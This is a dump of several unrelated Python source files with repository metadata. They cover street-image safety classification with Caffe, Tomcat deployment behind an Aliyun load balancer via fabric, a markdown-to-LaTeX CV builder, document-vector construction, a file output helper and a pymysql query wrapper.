#Name of csv data, which is used to verify data
# Ground-truth q-scores used to validate the network's Safe/Unsafe calls.
verify_file = 'streetscore_newyorkcity.csv'
#Name of output file from comparison
results_file = 'safe_comparison.txt'
errors_file = 'safe_errors.txt'
# Column layouts for the results/errors report lines.
format_results = '%-25s %10s %10s %10s\n'
format_error = '%-25s %40s\n'
# Opened in append mode so repeated runs accumulate into the same reports.
fResults = open(results_file, 'a')
fResults.write(format_results % ('Long,Lat', 'Streetscore', 'Network', 'Match'))
fErrors = open(errors_file, 'a')
fErrors.write(format_error % ('Long,Lat', 'Error'))
# Number of images sampled and scored per coordinate.
cutOffImages = 15
data_location = 'data/scene/images/'
#Set up image acquiring and pre processing
#---------------------------------------------------------------------------------------------
#Method to access Euclid and find all the images
def findImages(coordinates, radius):
    """Query the Carmera image API for images around a point.

    :param coordinates: "<long>,<lat>" string accepted by the API.
    :param radius: search radius in metres.
    :return: decoded JSON response dict, or None when the request fails.
    """
    try:
        res = im.search({
            'point' : coordinates,
            'radius' : radius
        })
        return res.json()
    except Exception as e:
        # The Carmera client's errors carry an HTTP status code and a JSON
        # message, but other exceptions (e.g. network failures) have neither;
        # getattr keeps the logging itself from raising AttributeError.
        print(getattr(e, 'code', '<no HTTP status>'))    ## HTTP status code
        print(getattr(e, 'error', e))                    ## JSON error message
        return None
#Need to fix this, just randomly did it
def chooseImages(coordinates):
    """Pick cutOffImages image ids near the given coordinates.

    Starts with a 50 m search radius and widens it in 10 m steps until the
    API reports at least cutOffImages results, giving up beyond 150 m.

    :param coordinates: "<long>,<lat>" string passed to findImages().
    :return: list of cutOffImages randomly chosen image ids, or None when
        not enough images exist within the maximum radius.
    """
    current_radius = 50
    large_radius = 150
    inc_radius = 10
    data = None
    while data is None or data['properties']['page_size'] < cutOffImages:
        if current_radius > large_radius:
            return None
        data = findImages(coordinates, current_radius)
        current_radius += inc_radius
    # Randomly sample cutOffImages ids out of everything the API returned.
    image_ids = [feature['properties']['id'] for feature in data['features']]
    random.shuffle(image_ids)
    return image_ids[:cutOffImages]
#Need a method to download images
def downloadImages(images):
    """Download every image id in *images* to <caffe_root><data_location><id>.jpg.

    A failed download is logged to the errors file and skipped; it never
    aborts the rest of the batch.
    """
    import time  # stdlib; imported locally because the module header does not import it
    for image_id in images:
        try:
            im.download(image_id, caffe_root + data_location +
                        '{}.jpg'.format(image_id))
            # Throttle: one request per second against the Carmera API.
            # (Bug fix: this was a bare `sleep(1)` with no import in scope,
            # which raised NameError and made every successful download get
            # logged below as a failure.)
            time.sleep(1)
        except Exception as e:
            fErrors.write(format_error %
                          (str(image_id), 'Unable to download following image'))
            print('Something went wrong with downloading image ' + str(image_id))
            print(e)
#Clean up images from machine after downloading them
def cleanImages(images):
    """Delete the locally downloaded .jpg for every id in *images*, if present."""
    for image_id in images:
        local_path = caffe_root + data_location + '{}.jpg'.format(image_id)
        if os.path.isfile(local_path):
            os.remove(local_path)
#Running images through network
#---------------------------------------------------------------------------------------------
#Run through network
def runThroughNetwork(images, cutOffValue):
    """Classify a coordinate as 'Safe'/'Unsafe' from its downloaded images.

    Each image is pushed through the Caffe net; an image "votes" safe when
    its 'safe' class probability is at least cutOffValue.  The overall
    verdict is 'Safe' when at least half of the usable images vote safe.
    """
    # Fraction of safe votes required for an overall 'Safe' verdict.
    cutoff_network_probability = .5
    safe_cnn = 0
    num_images = len(images)
    for image_id in images:
        file_exists = caffe_root + data_location + '{}.jpg'.format(image_id)
        if (not os.path.isfile(file_exists)):
            # Missing file: rescale votes accumulated so far from a
            # 1/num_images basis to 1/(num_images-1), then shrink the pool.
            # NOTE(review): divides by zero if num_images reaches 1 here
            # (i.e. every image missing) -- confirm upstream guarantees
            # at least one file survives.
            safe_cnn *= (num_images/(num_images-1))
            num_images -= 1
            fErrors.write(format_error %
                (str(image_id), 'The image disappeared or was never downloaded'))
            continue
        image = caffe.io.load_image(file_exists)
        transformed_image = transformer.preprocess('data', image)
        net.blobs['data'].data[...] = transformed_image
        output = net.forward()
        #the output probability vector for the first image in the batch
        output_prob = output['prob'][0]
        safe_prob = output_prob[0] #Index of safe = 0 (place in label_names.txt)
        #print (safe_prob)
        if (safe_prob >= cutOffValue):
            # Each voting image contributes an equal 1/num_images share.
            safe_cnn += (1.00/num_images)
    if safe_cnn < cutoff_network_probability:
        return 'Unsafe'
    else:
        return 'Safe'
#Validation testing logic
#---------------------------------------------------------------------------------------------
# Counters are seeded with the totals from a previous partial run so the
# printed tallies continue where that run left off.
coord_counter = 1297
matches_counter = 672
with open(verify_file) as csvfile: #Creates csv file object
    #reader = csv.reader(csvfile) #Creates csvfile reader
    #Skip first some rows in the csv file
    #for i in range(1234):
    #    reader.next()
    #row: [lat, long, q-score]
    # Hardcoded single test row; the csv reader above is disabled for now.
    reader = [['40.700909','-74.013504','11.062166']]
    #  ['40.752728', '-73.971451' ,'26.864557']}
    #row = ['40.752728', '-73.971451' ,'26.864557']
    for row in reader:
        # API expects "long,lat"; the CSV stores [lat, long, q-score].
        coordinates = row[1] + ',' + row[0]
        print (coordinates)
        qscore = float(row[2])
        # Map the continuous streetscore to a binary ground-truth label,
        # skipping the ambiguous middle band (4.5..5.5).
        if qscore < 4.5:
            hot_safe = 'Unsafe'
        elif qscore > 5.5:
            hot_safe = 'Safe'
        else:
            print ('Indecisive qscore')
            fErrors.write(format_error % (coordinates, 'Indecisive qscore'))
            continue
        image_ids = chooseImages(coordinates)
        # NOTE(review): prefer `image_ids is None` over `== None`.
        if image_ids == None:
            print ('Not enough images')
            fErrors.write(format_error %
                (coordinates, 'Less than 10 images in 150m radius'))
            continue
        coord_counter += 1
        if coord_counter % 20 == 0:
            print('Number of coordinates covered: {}'.format(coord_counter))
            print('Number of matching coordinates: {}'.format(matches_counter))
        #print ('Coordinate Number {}'.format(coord_counter))
        # Flush so progress survives a crash mid-run (files opened in append mode).
        fResults.flush()
        fErrors.flush()
        downloadImages(image_ids)
        # .01 is the per-image 'safe' probability threshold (cutOffValue).
        network_safe = runThroughNetwork(image_ids, .01)
        fResults.write(format_results %
            (coordinates, hot_safe, network_safe, (hot_safe==network_safe)))
        if hot_safe==network_safe:
            matches_counter += 1
        cleanImages(image_ids)
fResults.close()
fErrors.close()
print('Number of coordinates covered: {}'.format(coord_counter))
print('Number of matching coordinates: {}'.format(matches_counter))
| [
"patrickbochen@gmail.com"
] | patrickbochen@gmail.com |
2a9692f84fde912561c1af5585e107e2933da948 | 1ca71cd18de29def84ab70818b12633f96247ecd | /deploy_service.py | a15bedf3cbf63a258db262b4967e2d175cf67815 | [] | no_license | masonchen2014/alipython | 2e3286728025ecfe712e26afe37f160b44700d7e | 1b6e747611fefd01e706d6035d40b0198798ebc8 | refs/heads/master | 2020-03-09T21:46:38.459738 | 2018-04-20T08:52:29 | 2018-04-20T08:52:29 | 129,018,236 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,916 | py | from fabric.api import *
from configparser import ConfigParser
from aliyun import AliHelper
import time
import requests
class DeployServce:
    """One deployable Tomcat service: uploads a WAR over fabric, cycles the
    Tomcat instance and adjusts the service's weight on an Aliyun SLB.

    NOTE(review): the class name is missing an 'i' ("Servce"); renaming it
    would break callers, so it is only flagged here.
    """
    def __init__(self,war_file_path,target_tmp_path,tomcat_path,service_port,service_name,slb_id,health,alihelper):
        # Local WAR path and its bare file name.
        self.wpath = war_file_path.rstrip('/')
        self.wfile = self.wpath[self.wpath.rfind('/')+1:]
        # Remote staging dir, Tomcat root and its webapps/ deploy dir
        # (all normalized to end with exactly one '/').
        self.ttpath = target_tmp_path.rstrip('/')+'/'
        self.tomcatpath = tomcat_path.rstrip('/')+'/'
        self.tpath = tomcat_path.rstrip('/')+'/webapps/'
        # NOTE(review): sport is concatenated into strings below, so it is
        # expected to be a str (ConfigParser.get returns str) -- confirm.
        self.sport = service_port
        self.sname = service_name
        self.slb_id = slb_id
        self.health = health
        self.alihelper = alihelper
        # public-IP -> backend server id, filled by get_hosts().
        self.hostDict = {}
    def get_hosts(self,instanceDict,slbDict):
        """Resolve this service's SLB backends to hosts; returns public IPs.

        Side effects: fills hostDict and records regionId; serverId keeps
        only the last backend iterated.
        """
        innerHosts = []
        pubHosts = []
        regionId,serverIds = self.alihelper.get_backend_servers_from_dict(slbDict,self.slb_id)
        for serverId in serverIds:
            iHost,pHost = self.alihelper.get_server_ip_from_dict(instanceDict,serverId)
            innerHosts.append(iHost)
            pubHosts.append(pHost)
            self.hostDict[pHost] = serverId
        self.regionId = regionId
        self.serverId = serverId
        return pubHosts
    def set_host_weight(self,host,weight):
        """Set the SLB weight of the backend behind the given public IP
        (weight 0 drains traffic before deploying)."""
        # print(self.regionId)
        # print(self.slb_id)
        # print(self.serverId[index])
        # print(weight)
        self.alihelper.set_backend_server('slb.aliyuncs.com','2014-05-15',self.regionId,self.slb_id,self.hostDict[host],weight)
    def mkdir_remote(self):
        """Create the remote staging and backup directories (fabric sudo)."""
        sudo('mkdir -p '+self.ttpath)
        sudo('mkdir -p /home/bak/'+self.sname)
    def upload_file(self):
        """Upload the shutdown helper script and the WAR to the staging dir."""
        put('./shutdown_tomcat.sh',self.ttpath+'shutdown_tomcat.sh',use_sudo=True)
        put(self.wpath,self.ttpath+self.wfile,use_sudo=True)
    def shutdown_tomcat(self):
        """Stop the Tomcat listening on sport via the uploaded helper script."""
        sudo('bash '+self.ttpath+'shutdown_tomcat.sh '+self.sport+' '+self.tomcatpath)
    def copy_war(self):
        """Back up the deployed WAR (timestamp suffix), install the new one
        and remove the old exploded webapp directory.

        NOTE(review): rstrip('.war') strips *characters* from the set
        {., w, a, r}, not the suffix -- a name like "war.war" collapses to
        ""; confirm WAR names never end in those letters before the suffix.
        """
        tswfile =self.wfile+'.'+repr(time.time())
        sudo('mv '+self.tpath+self.wfile+' /home/bak/'+self.sname+'/'+tswfile)
        sudo('cp '+self.ttpath+self.wfile+' '+self.tpath)
        sudo('rm -rf '+self.tpath+self.wfile.rstrip('.war'))
    def start_tomcat(self):
        """Launch Tomcat in the background on the remote host."""
        sudo('set -m;bash '+self.tomcatpath+'bin/startup.sh &')
    def test_tomcat(self,host,trytimes,):
        """Poll the health page every 5 s, up to *trytimes* attempts, until
        it answers HTTP 200.

        NOTE(review): requests.get raises (is not caught) while the service
        is still refusing connections -- confirm callers tolerate that.
        """
        health_page = 'http://'+host+':'+self.sport+self.health
        try_times = trytimes
        i = 1
        while i <= try_times:
            i = i+1
            time.sleep(5)
            print(health_page)
            res = requests.get(health_page)
            # print('we now get the status')
            if res.status_code == 200:
                print('service started!')
                break
            else:
                print('can not access the service!!!')
        # run('curl -v localhost:'+self.sport)
class DeployServices:
    """Registry of DeployServce objects, one per section of an ini file."""
    def __init__(self,config,alihelper):
        """Parse *config* (ini path) and build one DeployServce per section."""
        ini = ConfigParser()
        ini.read(config)
        self.servicesDict = {}
        for name in ini.sections():
            # Read the seven per-service options in constructor order.
            args = [ini.get(name, option) for option in (
                'war_file_path', 'target_tmp_path', 'tomcat_path',
                'service_port', 'service_name', 'slb_id', 'health')]
            self.servicesDict[name] = DeployServce(*args, alihelper)
    def get_services(self,*service_names):
        """Return the known services among *service_names*, preserving order;
        unknown names are reported on stdout and skipped."""
        found = []
        for name in service_names:
            if name in self.servicesDict:
                found.append(self.servicesDict[name])
            else:
                print('unknown service name '+name)
        return found
| [
"mason@localhost.localdomain"
] | mason@localhost.localdomain |
e464c2381b3c080603299e821958e97a5e00965b | fca0173560876c5f43aac5ecd2d41330d1d22b5d | /cv/tex.py | 048ecbc375de1623ad308242ec907bc8266baf6a | [] | no_license | jorgebg/cv | 9223bba1e64322fb47e4d33536818ba3fe55bee1 | 24437e4f558e697bfe7abb1f512d9745f6dc6df3 | refs/heads/master | 2020-12-12T05:37:35.226132 | 2020-05-19T17:23:09 | 2020-05-19T17:23:09 | 29,673,733 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,664 | py | import re
import sys
from functools import namedtuple
import mistune
import jinja2
import cv
from cv.templated import Templated
# Characters that are special to LaTeX, mapped to their escaped forms
# (the \letter* macros are expected to be defined by the LaTeX template).
ESCAPE_CHARS = {
    '&': r'\&',
    '%': r'\%',
    '$': r'\$',
    '#': r'\#',
    '_': r'\letterunderscore{}',
    '{': r'\letteropenbrace{}',
    '}': r'\letterclosebrace{}',
    '~': r'\lettertilde{}',
    '^': r'\letterhat{}',
    '\\': r'\letterbackslash{}',
}
def escape(text, quote=False, smart_amp=True):
    """Escape LaTeX-special characters in *text*, one character at a time.

    The *quote* and *smart_amp* parameters exist only so this function can
    be swapped in for ``mistune.escape`` (see Builder.run) and are ignored.
    """
    return "".join(ESCAPE_CHARS.get(ch, ch) for ch in text)
class Environment(jinja2.Environment):
    """Jinja environment with LaTeX-friendly delimiters.

    The positional arguments set, in order: block start '%{', block end '}',
    variable start '#{', variable end '}', comment start '%', comment end
    newline -- so plain '{'/'}'/'%' in LaTeX templates stay usable.
    """
    def __init__(self):
        super().__init__('%{', '}', '#{', '}', '%', "\n")
        # Expose the LaTeX escaper as both 'e' and 'escape' filters.
        self.filters.update({
            'def': self.def_filter,
            'e': escape,
            'escape': escape
        })
    def def_filter(self, defs):
        """Render a dict as a series of LaTeX \\def\\<key>{<value>} lines.

        NOTE(review): value is escaped here *and* again by the '| e' filter
        in the template below -- this looks like double escaping; confirm
        whether one of the two should be removed.
        """
        result = ""
        for key, value in defs.items():
            value = escape(value)
            template = self.from_string(r"\def\#{key}{#{value | e}}")
            result += template.render(key=key, value=value) + "\n"
        return result
class Renderer(mistune.Renderer):
    """Mistune renderer emitting LaTeX.

    Each method decorated with @_t (Templated) returns a Jinja template
    string -- optionally paired with vars() for its context -- which the
    decorator renders through ENV.  Template bodies sit at column 0 so the
    emitted LaTeX carries no stray indentation.
    """
    ENV = Environment()
    _t = Templated(ENV)
    @_t
    def block_code(self, code, lang=None):
        return \
r"""
\begin{verbatim}
#{code}
\end{verbatim}
"""
    @_t
    def block_quote(self, text):
        return \
r"""
\begin{quote}
#{text}
\end{quote}
"""
    @_t
    def header(self, text, level, raw=None):
        # Bug fix: `raise NotImplemented()` raised TypeError (NotImplemented
        # is a non-callable constant); NotImplementedError is the exception.
        if level > 3:
            raise NotImplementedError()
        # level 1 -> \section, 2 -> \subsection, 3 -> \subsubsection.
        section = ('sub' * (level - 1)) + 'section'
        return \
r"""
\#{section}{#{text}}
""", vars()
    @_t
    def hrule(self):
        return \
r"""
\hrule
"""
    @_t
    def list(self, body, ordered=True):
        env = 'enumerate' if ordered else 'itemize'
        return \
r"""
\begin{#{env}}
#{body}
\end{#{env}}
""", vars()
    @_t
    def list_item(self, text):
        return \
r"""
\item #{text}
"""
    @_t
    def paragraph(self, text):
        return \
r"""
#{text} \par
"""
    @_t
    def double_emphasis(self, text):
        return r"\textbf{#{text}}"
    @_t
    def emphasis(self, text):
        return r"\emph{#{text}}"
    @_t
    def codespan(self, text):
        return r"\texttt{#{text}}"
    @_t
    def linebreak(self):
        return r"\\"
    @_t
    def autolink(self, link, is_email=False):
        # Bug fix: same NotImplemented() -> NotImplementedError() as above.
        if is_email:
            raise NotImplementedError()
        # Strip the scheme; \web{} is expected to format the bare address.
        web = re.compile(r'^https?://').sub('', link)
        web = escape(web)
        return r"\web{#{web}}", vars()
    @_t
    def link(self, link, title, text):
        # NOTE(review): braces look unbalanced and `text` is unused here --
        # confirm the \anchor macro's expected arguments.
        return r"\anchor{#{link}{#{title}}"
class CVRenderer(Renderer):
    """LaTeX renderer that maps markdown headers to custom CV environments.

    Maintains a stack of open sections; level-1 headers open/close a
    '<title>_section' LaTeX environment, deeper headers reuse the plain
    \\(sub)section commands from Renderer.
    """
    _t = Renderer._t
    # One stack entry per open header: its environment name, title text,
    # header level and raw markdown.
    Section = namedtuple('Section', ['env', 'text', 'level', 'raw'])
    def __init__(self, *args, **kwargs):
        self.sections = []
        super().__init__(*args, **kwargs)
    def end(self):
        """Close every environment still open at the end of the document."""
        return "\n".join(self.endenv())
    def endenv(self, level=0):
        """Pop sections at or below *level*; emit \\end{...} for level-1 ones
        (deeper levels have no environment of their own)."""
        envs = []
        while self.sections and level <= self.sections[-1].level:
            ended = self.sections.pop()
            if ended.level < 2:
                template = self.ENV.from_string(r"\end{#{env}}")
                envs.append(template.render(**ended._asdict()))
        return envs
    def beginenv(self, section):
        """Emit the opening text for *section*: a (sub)section command for
        deep headers, a \\begin{...} environment for level-1 headers."""
        envs = []
        if section.level > 1:
            envs.append(super().header(section.text, section.level, section.raw))
        if section.level < 2:
            template = self.ENV.from_string(r"\begin{#{env}}")
            envs.append(template.render(**section._asdict()))
        return envs
    @_t
    def hrule(self):
        return \
r"""
\hrulefill
"""
    @_t
    def block_quote(self, text):
        # Inside a section, use that section's specialised quote environment
        # (e.g. 'experience_section_quote'); otherwise plain 'quote'.
        env = 'quote'
        if self.sections:
            env = '{}_{}'.format(self.sections[-1].env, env)
        return \
r"""
\begin{#{env}}#{text}
\end{#{env}}
""", vars()
    @_t
    def header(self, text, level, raw=None):
        # Close any sections this header terminates, then open the new one.
        endenv = self.endenv(level)
        if level > 1:
            # Derive e.g. 'experience_subsection' from the root section's
            # env name by inserting 'sub' before the trailing 'section'.
            i = -len('section')
            rootenv = self.sections[0].env
            sectionenv = rootenv[:i] + ('sub' * (level - 1)) + rootenv[i:]
        else:
            # Level-1 env name comes from the header title itself.
            sectionenv = text.lower().replace(' ', '_') + '_section'
        section = self.Section(sectionenv, text, level, raw)
        self.sections.append(section)
        beginenv = self.beginenv(section)
        return "\n".join(endenv + beginenv)
class Parser(mistune.Markdown):
    """Markdown parser that appends the renderer's pending environment closers."""

    def output(self, text, rules=None):
        rendered = super().output(text, rules)
        trailer = self.renderer.end()
        return rendered + trailer
class Builder(cv.Builder):
    """CV builder wiring the LaTeX renderer into the base pipeline."""

    def __init__(self):
        parser = Parser(renderer=CVRenderer(), hard_wrap=True)
        super().__init__(parser=parser, env=Renderer.ENV)

    def run(self, doc):
        """Run the build with mistune's global ``escape`` swapped for ours.

        Fixed: the original restored ``mistune.escape`` only on success, so
        an exception inside ``run`` left the LaTeX escaper installed
        globally; try/finally guarantees restoration.
        """
        _escape = mistune.escape
        mistune.escape = escape
        try:
            super().run(doc)
        finally:
            mistune.escape = _escape
| [
"jorge.barata.gonzalez@gmail.com"
] | jorge.barata.gonzalez@gmail.com |
a9a995593bea8486c1a66b449b79bb38b75bd42d | e732b4d8ae47cfc6b3c051c1792268928dbfaaf8 | /mk_doc_vectors.py | 17831954f69475e3760a2becf9168f0318d2e48d | [] | no_license | ml-for-nlp/topic-classification | 584aa186bedd1dce8fb4747f3185175de77eb2cd | 882157805439d7b403499942b6aab1e4d0541d6d | refs/heads/master | 2020-04-30T23:24:52.416033 | 2020-04-10T07:50:32 | 2020-04-10T07:50:32 | 177,143,542 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,800 | py | #USAGE: python3 mk_doc_vectors.py
import re
import sys
from collections import Counter
from math import isnan
from os import listdir
from os.path import isfile, isdir, join

import numpy as np
from sklearn.decomposition import PCA
feature_type = sys.argv[1]
def read_vocab(path='./data/vocab_file.txt'):
    """Load the vocabulary, one token per line.

    Args:
        path: location of the vocabulary file. Defaults to the project's
            data directory, so existing ``read_vocab()`` calls are unchanged.

    Returns:
        list[str]: tokens in file order, without trailing newlines.
    """
    with open(path, 'r') as f:
        vocab = f.read().splitlines()
    return vocab
def get_words(l):
    """Lower-case *l* and count its whitespace-separated tokens.

    Returns:
        Mapping of token -> occurrence count. A collections.Counter is
        returned (a dict subclass), so existing callers using ``in`` and
        ``.items()`` behave exactly as with the old hand-rolled dict.
    """
    return Counter(l.lower().split())
def get_ngrams(l, n):
    """Lower-case *l* and count its character n-grams of length *n*.

    Returns:
        Mapping of ngram -> occurrence count (a collections.Counter, a dict
        subclass). A string shorter than *n* yields an empty mapping, same
        as the original loop (empty range).
    """
    l = l.lower()
    return Counter(l[i:i + n] for i in range(len(l) - n + 1))
def normalise(v):
    """L1-normalise vector *v* so its entries sum to 1.

    Note: a zero-sum vector triggers division by zero (inf/nan entries);
    downstream code filters such rows out.
    """
    total = sum(v)
    return v / total
def run_PCA(d, docs):
    """Drop degenerate document vectors and project the rest to 300 dims.

    Args:
        d: mapping url -> feature vector.
        docs: iterable of urls defining row order.

    Returns:
        (np.ndarray of shape (n_kept, 300), list of retained urls).
    """
    kept_rows = []
    kept_urls = []
    for url in docs:
        total = sum(d[url])
        if isnan(total) or total == 0:
            continue  # skip all-zero or NaN vectors
        kept_rows.append(d[url])
        kept_urls.append(url)
    reducer = PCA(n_components=300)
    reducer.fit(kept_rows)
    reduced = reducer.transform(kept_rows)
    return np.array(reduced), kept_urls
def clean_docs(d, docs):
    """Return (matrix, urls) keeping only documents whose vector is finite
    and not all-zero; row order follows *docs*."""
    def _usable(vec):
        total = sum(vec)
        return (not isnan(total)) and total != 0

    kept = [(url, d[url]) for url in docs if _usable(d[url])]
    retained = [url for url, _ in kept]
    rows = [vec for _, vec in kept]
    return np.array(rows), retained
d = './data'
catdirs = [join(d, o) for o in listdir(d) if isdir(join(d, o))]
vocab = read_vocab()
# O(1) token -> column lookup. The original called vocab.index(k) for every
# token, which is O(|vocab|) per lookup and made the pass quadratic.
vocab_index = {token: i for i, token in enumerate(vocab)}

for cat in catdirs:
    print(cat)
    url = ""
    docs = []
    vecs = {}
    with open(join(cat, "linear.txt"), 'r') as doc_file:
        for l in doc_file:
            l = l.rstrip('\n')
            if l[:4] == "<doc":
                # Document start: key the vector by the header's date field.
                m = re.search("date=(.*)>", l)
                url = m.group(1).replace(',', ' ')
                docs.append(url)
                vecs[url] = np.zeros(len(vocab))
                # Bug fix: without this continue, the header line's own text
                # was fed through the feature extractors below.
                continue
            if l[:5] == "</doc":
                vecs[url] = normalise(vecs[url])
                print(url, sum(vecs[url]))
                # Bug fix: without this continue, features of the literal
                # "</doc" marker were added AFTER normalisation, corrupting
                # the finished vector.
                continue
            if feature_type == "ngrams":
                # Character n-grams of lengths 3..6.
                for i in range(3, 7):
                    for k, v in get_ngrams(l, i).items():
                        col = vocab_index.get(k)
                        if col is not None:
                            vecs[url][col] += v
            if feature_type == "words":
                for k, v in get_words(l).items():
                    col = vocab_index.get(k)
                    if col is not None:
                        vecs[url][col] += v
    m, retained_docs = clean_docs(vecs, docs)
    print("------------------")
    print("NUM ORIGINAL DOCS:", len(docs))
    print("NUM RETAINED DOCS:", len(retained_docs))
    with open(join(cat, "vecs.csv"), 'w') as vec_file:
        for i in range(len(retained_docs)):
            vec_file.write(retained_docs[i] + ',' + ','.join(str(v) for v in m[i]) + '\n')
| [
"aurelie.herbelot@cantab.net"
] | aurelie.herbelot@cantab.net |
947c86d39b47a7af1728173b26c2bd6fe0390e27 | 75c227dcb962282ba40084ecba70b6b9bc0b6810 | /5.3.py | cb178b39292eeb69e4cb232642e00e2a7e77f370 | [] | no_license | vedantvajre/PythonDataScience | 3b87b2991f42bad4db1d44396c36bd4dff731cec | 3795225e4633b10ad3b881405ebef5d0327ae972 | refs/heads/master | 2020-06-11T08:10:08.869872 | 2019-06-26T22:06:29 | 2019-06-26T22:06:29 | 193,900,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | alien_color = "red"
if alien_color == "red":
print("You have earned 5 points!")
alien_color = "yellow"
if alien_color == "red":
print("You won!") | [
"vedantvajre@gmail.com"
] | vedantvajre@gmail.com |
65e7651930393e2c836a4314c0ed1bdf3349fe6f | 68b41912ce7f37cc56fad963f12e1a934ea959e6 | /model/core/output.py | 0b9d1ef9eb753513056018b52da8b8c2da1e6910 | [
"MIT"
] | permissive | BernardTsai/model | 730cfe9371819c781f73f5515996e6465a4b3131 | 950a8d34106ddfb7ef7985a3eca6d72524733c38 | refs/heads/master | 2023-04-16T17:11:34.384982 | 2021-04-20T18:24:42 | 2021-04-20T18:24:42 | 103,212,329 | 0 | 0 | MIT | 2021-04-20T18:24:43 | 2017-09-12T02:32:04 | Python | UTF-8 | Python | false | false | 3,410 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# output.py:
#
# A class to provide functionality for writing data.
#
# ------------------------------------------------------------------------------
import os
import sys
import re
import codecs
# ------------------------------------------------------------------------------
#
# Class Output
#
# ------------------------------------------------------------------------------
class Output():
    """Writes blocks of text to STDOUT or to files.

    Input data may contain directive lines of the form ``>> <path> [comment]``;
    text following such a directive is routed to <path> (relative to
    *directory* when one was given) until the next directive. Text before the
    first directive goes to STDOUT.
    """

    # --------------------------------------------------------------------------
    def __init__(self, directory=None):
        """Initialize"""
        self.directory = directory
        self.data = None
        self.filenames = []
        self.blocks = []

    # --------------------------------------------------------------------------
    def write(self, data):
        """Split *data* on ``>> path`` directives and emit each block."""
        self.data = data
        self.filenames = []
        self.blocks = []
        directive = re.compile(">> ([^ ]*)(.*)")
        target = ""
        chunk = ""
        for line in data.splitlines():
            found = directive.match(line)
            if found:
                # flush what was collected for the previous target,
                # unless nothing accumulated
                if chunk != "":
                    self.write2(target, chunk)
                    chunk = ""
                target = found.group(1)
            elif chunk == "":
                chunk = line  # note: leading empty lines are dropped
            else:
                chunk = chunk + "\n" + line
        # the final block always goes out, even when empty
        self.write2(target, chunk)

    # --------------------------------------------------------------------------
    def write2(self, filename, block):
        """Emit one *block* to STDOUT (no filename) or to *filename*."""
        self.blocks.append(block)
        if not filename:
            self.filenames.append("STDOUT")
            print(block)
            return
        filepath = os.path.join(self.directory, filename) if self.directory else filename
        self.filenames.append(filepath)
        # write block as a UTF-8 text file
        with codecs.open(filepath, "w", "utf-8") as stream:
            stream.write(block)

    # --------------------------------------------------------------------------
    def getDirectory(self):
        """Provide directory"""
        return self.directory

    # --------------------------------------------------------------------------
    def getData(self):
        """Provide raw data"""
        return self.data

    # --------------------------------------------------------------------------
    def getFilenames(self):
        """Provide filenames"""
        return self.filenames

    # --------------------------------------------------------------------------
    def getBlocks(self):
        """Provide blocks"""
        return self.blocks
| [
"bernard@tsai.eu"
] | bernard@tsai.eu |
238b0ff7d600e6fc3bd33dae6392ff807f618e64 | d869f6e6b0c07341086402325f193ac6b2cc2191 | /program accept two numbers and identify even number out of them..py | 64fef27c2232a794ac207b713e2e93354649ac40 | [] | no_license | SARAOGIAMAN/PYTHON-PROGRAMS | 46811a161c0020f4f23b5d617c9e5dca03543184 | deae16b35a569f79e53e79a8cba3e711a628a7d7 | refs/heads/main | 2023-02-13T23:18:57.376444 | 2021-01-11T17:17:23 | 2021-01-11T17:17:23 | 310,389,061 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | a = int(input("Enter a: "))
b = int(input("Enter b: "))
# Classify parity: exactly one even, both even, or (else) both odd.
# The four branches are mutually exclusive and exhaustive.
if(a%2==0 and b%2==1):
    print("a is even")
elif(b%2==0 and a%2==1):
    print("b is even")
elif(a%2==0 and b%2==0):
    print("Both are even")
else:
    # only remaining case: both a and b are odd
    print("Both are odd")
| [
"noreply@github.com"
] | SARAOGIAMAN.noreply@github.com |
07f2933b9cadfb1eecf85bdfb76c97d0c29a75a4 | 1a721736f3fd57b0fffcac7b9481e3b6b272909d | /IT - 412/finalAssignment/classes/database_access.py | 26958d8fd76940a94bae153917f739ac33fd4913 | [] | no_license | vifezue/PythonWork | eed6609f2b56aa038082e599476f7ba3b8c471a0 | c9fc7f312f9d73fef6af6d13459ea4a69b16cdca | refs/heads/master | 2022-11-28T10:42:10.246227 | 2020-07-18T03:40:42 | 2020-07-18T03:40:42 | 280,537,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,843 | py | import pymysql
class DB_Connect():
    """A simple class for connecting to a database and performing queries"""

    def __init__(self, passed_db_username, passed_db_password, passed_database):
        """Store credentials; the connection is opened lazily per query."""
        self.passed_db_username = passed_db_username
        self.passed_db_password = passed_db_password
        self.passed_database = passed_database
        self.conn = None

    def __connect(self):
        """Creates connections to the database when they are needed"""
        self.conn = pymysql.connect(host='localhost',
                                    user=self.passed_db_username,
                                    password=self.passed_db_password,
                                    db=self.passed_database,
                                    charset='utf8mb4',
                                    cursorclass=pymysql.cursors.DictCursor,
                                    autocommit=True)

    def _close(self):
        """Close the current connection (if any) and mark it unusable.

        Fixes two bugs in the original: (1) the closed connection object was
        left in ``self.conn``; since it is still truthy, the next query
        skipped reconnecting and used a dead handle. (2) ``self.conn.close()``
        ran even when the connect itself had failed and ``self.conn`` was
        None, raising AttributeError.
        """
        if self.conn:
            self.conn.close()
        self.conn = None

    def executeQuery(self, passed_query):
        """Executes a database query for Inserts, Updates, and Deletes"""
        try:
            if not self.conn:
                self.__connect()
            with self.conn.cursor() as cursor:
                cursor.execute(passed_query)
        except Exception as error:
            print(error)
        finally:
            self._close()

    def executeSelectQuery(self, passed_query):
        """Executes a SELECT database query and returns the results as a tuple-like structure"""
        try:
            if not self.conn:
                self.__connect()
            with self.conn.cursor() as cursor:
                cursor.execute(passed_query)
                # finally still closes the connection after this return;
                # the original leaked the connection on the success path.
                return cursor.fetchall()
        except Exception as error:
            print(error)
        finally:
            self._close()
| [
"ifezue@me.com"
] | ifezue@me.com |
